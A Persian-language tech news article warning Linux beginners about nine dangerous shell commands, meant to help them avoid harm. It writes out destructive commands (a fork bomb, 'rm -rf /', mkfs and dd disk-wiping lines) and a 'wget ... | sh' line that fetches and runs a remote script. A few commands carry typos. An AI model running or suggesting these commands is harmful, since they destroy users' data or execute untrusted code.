9 فرمان و کد خطرناک لینوکس که باید مراقب آنها باشید

خبرنامه دانشجویان ایران: فرامین ترمینال یا شل در لینوکس بسیار قدرتمند هستند و تنها یک فرمان ساده می‎تواند منجر به حذف یک فایل، فولدر یا موارد خطرات دیگر شود. در برخی از موارد لینوکس حتی برای دریافت تاییدیه اجرای یک فرمان هیچ سوالی نمی‎پرسد و با اجرای مستقیم آن باعث از بین رفتن اطلاعات ارزشمند شما می‎شود. ما برخی از فرامین لینوکس که می‎تواند برای سیستم شما مضر باشد را گردآوری کرده‎ایم تا به شما کمک کند از آنها دوری کنید.

به گزارش خبرنگار فناوری اطلاعات «خبرنامه دانشجویان ایران»؛ معمولا تازه کاران لینوکس برای یادگیری فرامین به وب مراجعه می‎کنند و اگر منابع مورد اطمینان نباشد ممکن است با پیشنهاداتی برای اجرای برخی از فرامین توسط برخی از کاربران مواجه شوند که برای شوخی و سرگرمی‎ ارسال شده‎اند، اما برای این تازه کاران نه تنها شوخی نیست بلکه باعث دردسر آنها می‎شود.

ما برخی از فرامین لینوکس که می‎تواند برای سیستم شما مضر باشد را گردآوری کرده‎ایم تا به شما کمک کند از آنها دوری کنید. به یاد داشته باشید که برخی از آنها واقعا خطرناک هستند و حتی می‎توانند به روش‎های مختلف برای ایجاد دستورات جدید که صدمات بیشتری ایجاد می‎کند تغییر داده شوند.

نکته مهم دیگر این است که بعضی از این فرامین تنها در صورت استفاده شدن با پیشوند sudo در اوبونتو می‎توانند خطرناک باشند. در توزیع‎های دیگر لینوکس نیز خیلی از فرامین تنها در صورتی که به عنوان فرامین ریشه اجرا شوند خطرناک هستند.

در ادامه نگاهی به 9 فرمان و کدی که شما باید از اجرای آنها اجتناب کنید خواهیم داشت.

1. فرمان Fork Bomb در لینوکس
:(){ :|: & };: که با عنوان Fork Bomb نیز شناخته می‎شود یک حمله انکار سرویس در مقابل سیستم لینوکس است. :(){ :|: & };: یک تابع bash است. به محض اجرا خود را چندین بار تکرار می‎کند تا سیستم از کار بیافتد.

شما برای رهایی از آن تنها باید سیستم را ری‎استارت کنید. بنابراین در زمان اجرای این فرمان در پوسته لینوکس خود مراقب باشید.

2. فرمان mv folder/dev/null
mv folder/dev/null یکی دیگر از فرامین خطرناک است. Dev/null یا null device یک فایل دیوایس است که تمام داده‎های نوشته شده روی آن را پاک می‎کند، اما گزارش می‎دهد که عملیات نوشتن با موفقیت انجام شده است. از این فرمان به عنوان bit bucked یا black hole نیز یاد می‎شود.

3. فرمان rm –rf
فرمان rm –rf یک راه سریع برای حذف یک فولدر و محتویات درون آن در سیستم عامل لینوکس است. اگر شما روش صحیح استفاده از آن را بلد نباشید ممکن است به یک فرمان خطرات برای سیستم تبدیل شود. معروف‎ترین ترکیبات و گزینه‎های مورد استفاده با فرمان rm –rf شامل این موارد هستند:

•     فرمان rm برای پاک کردن فایل‎ها در سیستم لینوکس استفاده می‎شود.
•     فرمان rm –f فایل‎های فقط خواندنی موجود در یک فولدر را بدون هیچ پیغام هشدارهای حذف می‎کند.
•     فرمان rm –r محتوای یک فولدر را حذف می‎کند.
•     فرمان rm –d برای پاک کردن یک دایرکتوری خالی استفاده می‎شود و اگر این دایرکتوری خالی نباشد از حذف آن اجتناب می‎کند.
•     فرمان rm -rf/ برای حذف اجباری (حتی اگر در برابر بازنویسی محافظت شده باشد) محتوای دایرکتوری ریشه و زیر فولدرهای آن استفاده می‎شود.
•     فرمان rm -rf* برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده می‎شود.
•     فرمان rm -rf. نیز برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده می‎شود. می‎توان از فرمان rm -r.[^.]* نیز استفاده کرد.
•     فرمان rm –i برای حذف فایل‎ها و فولدرها استفاده می‎شود اما قبل از حذف با پیغام به شما هشدار می‎دهد.

4. فرمان mkfs
اگر شما هدفmkfs  را به درستی نشناسید می‎تواند به یک فرمان خطرناک تبدیل شود. هر چیزی که بعد از mkfs نوشته می‎شود فرمت شده و با سیستم فایل لینوکس خالی جایگزین می‎شود.

تمام فرامین فهرست شده در زیر هارد درایو شما را فرمت خواهد کرد و به مجوز مدیریتی نیاز دارد:

•     mkfs
•     mkfs.ext3
•     mkfs.bfs
•     mkfs.ext2
•     mkfs.minix
•     mkfs.msdos
•     mkfs.reiserfs
•     mkfs.vfat

فرمان mkfs.cramfs همان کار فرامین بالا را انجام می‎دهد اما برای اجرا شدن به مجوز مدیریتی احتیاج ندارد.

5. بمب Tar
از فرمان Tar برای جمع آوری چندین فایل داخل یک فایل واحد (یا فایل آرشیو) با فرمت  .tar استفاده می‎شود. اما با این فرمان می‎توان یک بمب Tape Archive (Tar) ساخت.

در یک فایل آرشیو که با هزاران یا حتی میلیون‎ها فایل هم نام با فایل‎های موجود در دایرکتوری جاری پر شده است در زمان استخراج این فایل‎ها با مشکل مواجه خواهید شد. شما می‎توانید با ساخت یک دایرکتوری محافظ در زمان دریافت یک فایل tar از گرفتار شدن در وضعیت بمب tar جلوگیری کنید.

اگر یک فایل tar به این وضعیت دچار شد شما به راحتی با حذف این دایرکتوری تازه ساخته شده می‎توانید از دست آن خلاص شوید. یک راه دیگر برای جلوگیری از انفجار بمب tar استفاده از گزینه –t برای فهرست کردن تمام محتوای یک فایل tar است که اطلاعاتی در مورد محتوای داخل این فایل tar در اختیار شما قرار می‎دهد.

6. فرمان dd
از فرمان dd برای کپی و تبدیل کردن پارتیشن‎های هارد دیسک استفاده می‎شود. اما اگر شما مقصد را به درستی تعیین نکنید می‎تواند آسیب رسان شود.

این فرمان ممکن است به یکی از این اشکال باشد:

•     dd if=/dev/hda of=/dev/hdb
•     dd if=/dev/hda of=/dev/sdb
•     dd if=something of=/dev/hda
•     dd if=something of=/dev/sda

فرمان زیر نیز کل هارد درایو primary را اصطلاحا صفر می‎کند: dd if=/dev/zero of=/dev/had

7. کد Shell Script
شما ممکن است با دانلود و اجرای یک اسکریپت پوسته مخرب قربانی آن شوید. این اسکریپت ممکن است شامل کدهای مخرب و خطرناک در داخل خود باشد. فرمت این فرمان ممکن است چیزی شبیه به این باشد: wget http://some_malicious_source -O- | sh

فرمان wget این اسکریپت را دانلود می‎کند و sh باعث اجرا شدن فایل دانلود شده می‎شود.

8. کدهای منبع مخرب
ممکن است شخصی به شما یک کد منبع را پیشنهاد کند و از شما بخواهد آن را کامپایل کنید. شاید در ظاهر این کد طبیعی به نظر برسد اما در واقع کدهای مخرب داخل حجم زیادی از کدهای منبع پنهان شده است و می‎تواند به سیستم شما صدمه بزند. برای جلوگیری از قربانی شدن توسط این نوع از حملات، این کدهای منبع پیشنهادی را تنها از منابع معتبر و شناخته شده قبول کنید.

9. بمب Decompression
شما ممکن است یک فایل فشرده شده دریافت کنید که در ظاهر حجم زیادی ندارد اما محتوای درون آن با سطح فشرده سازی بالا پر شده است. به محض این که این فایل را از حالت فشرده خارج می‎کنید حجم انبوهی از داده هارد درایو شما را پر کرده و عملکرد سیستم شما را پایین می‎آورد. برای جلوگیری از این وضعیت همیشه داده‎های مورد نظر خود را از منابع معتبر دریافت کنید.

منبع: hongkiat

نویسنده: محیا ضرابیان